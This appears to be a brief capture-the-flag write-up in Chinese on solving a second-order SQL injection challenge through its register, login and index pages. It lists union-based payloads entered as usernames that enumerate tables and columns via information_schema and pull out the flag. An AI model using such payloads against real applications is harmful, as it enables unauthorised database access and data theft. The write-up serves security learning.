October 2019 Twice SQL Injection.md

/?action=login

/?action=reg

/?action=index

题目明示是二次注入，而唯一的回显点是info

对info的注入没有什么收获，估计在写入的时候做了转义，而又没有其他情况是需要info拼接入查询的

因而注入点大底只可能是username了

推测对info的查询实现如下

SELECT INFO FROM USERS WHERE USERNAME = '$username';

尝试对用户名进行联合注入

username: ' union select database()#
password: 

username: ' union select group_concat(table_name) from information_schema.tables where table_schema = 'ctftraining'#
password: 

flag,news,users

username: ' union select group_concat(column_name) from information_schema.columns where table_name = 'flag'#
password: 

flag

username: ' union select group_concat(flag) from flag#
password: 

flag{0ee8b261-5b74-4931-8c2e-aa9cf771b6d5}

#Web #SQL注入 #二次注入